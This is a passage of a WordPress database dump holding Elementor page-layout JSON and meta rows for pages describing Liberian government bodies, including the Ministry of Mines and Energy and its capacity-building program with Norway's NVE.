et_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"264bc6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d731f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a7382d6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"7953955\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"2075f5e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4a557f9\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c927a2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"3e2a906\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"daadead\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"06bb2ab\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"7953955\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"91f39bd\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"059c488\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false}]'),(9292,1624,'_elementor_controls_usage','a:0:{}'),(9293,1624,'_elementor_edit_mode','builder'),(9294,1624,'_elementor_template_type','wp-post'),(9295,1624,'_elementor_version','2.7.5'),(9296,1624,'_wp_page_template','default'),(9297,1624,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"644e2d8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The MIA\'s responsibility is to administer Local Governance which basically involved Collection of Taxes, Maintenance of Peace and Tranquility, and Seeking the Welfare of the People. The MIA have undertaken some projects directly on government funding, while others are funded by development partners, including roads and bridges projects; local administrative buildings; commissioners\\u2019 residences; schools; clinics markets; peace huts; latrines; wells; etc.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c7fea51\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"610c742\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5da8f24\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"740d473\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"264bc6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d731f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a7382d6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"7953955\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"2075f5e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4a557f9\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c927a2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"3e2a906\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"daadead\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"06bb2ab\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"7953955\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"91f39bd\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"059c488\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false}]'),(9298,1608,'_edit_lock','1629284762:38'),(9299,1606,'_edit_lock','1631105680:38'),(9300,1604,'_edit_lock','1663165632:42'),(9301,1602,'_edit_lock','1629232721:42'),(9302,1625,'_elementor_controls_usage','a:0:{}'),(9303,1625,'_elementor_edit_mode','builder'),(9304,1625,'_elementor_template_type','wp-post'),(9305,1625,'_elementor_version','2.7.5'),(9306,1625,'_wp_page_template','default'),(9307,1625,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"47e134c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Ministry functions in the area of policy formulation for the energy, hydrocarbon and water sectors of the Liberia. MME has direct oversight responsibility in the energy sector, and also similar role in developing the water resources of the country.<\\/p><p>The Institutional Capacity Building and Strengthening of the Water Resources and Energy sectors of Liberia is a contract that is signed and in effect between the Norwegian Water Resources and Energy Directorate (NVE), and the Liberian Ministry of Mines and Energy (MME) to implement an Agreement (Program) between the Governments of Liberia and Norway. This Program is a 5-year (2010 \\u2013 2015) program that was signed in 2010.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"8e15880\",\"elType\":\"widget\",\"settings\":{\"title\":\"MME Resources\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c7fea51\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"610c742\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f9bdf80\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"740d473\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"264bc6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d731f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ef5e727\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b1fc198\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"73c163b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"e600ccf\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c927a2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"3e2a906\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"daadead\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0a541c9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b1fc198\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"9306a61\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"92d6861\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false}]'),(9308,1626,'_elementor_controls_usage','a:0:{}'),(9309,1626,'_elementor_edit_mode','builder'),(9310,1626,'_elementor_template_type','wp-post'),(9311,1626,'_elementor_version','2.7.5'),(9312,1626,'_wp_page_template','default'),(9313,1626,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"47e134c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Ministry functions in the area of policy formulation for the energy, hydrocarbon and water sectors of the Liberia. MME has direct oversight responsibility in the energy sector, and also similar role in developing the water resources of the country.<\\/p><p>The Institutional Capacity Building and Strengthening of the Water Resources and Energy sectors of Liberia is a contract that is signed and in effect between the Norwegian Water Resources and Energy Directorate (NVE), and the Liberian Ministry of Mines and Energy (MME) to implement an Agreement (Program) between the Governments of Liberia and Norway. This Program is a 5-year (2010 \\u2013 2015) program that was signed in 2010.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c7fea51\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"610c742\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f9bdf80\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"740d473\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"264bc6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d731f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ef5e727\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b1fc198\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"73c163b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"e600ccf\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c927a2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"3e2a906\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"daadead\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0a541c9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b1fc198\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"9306a61\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"92d6861\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false}]'),(9314,1627,'_elementor_controls_usage','a:0:{}'),(9315,1627,'_elementor_edit_mode','builder'),(9316,1627,'_elementor_template_type','wp-post'),(9317,1627,'_elementor_version','2.7.5'),(9318,1627,'_wp_page_template','default'),(9319,1627,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"76ca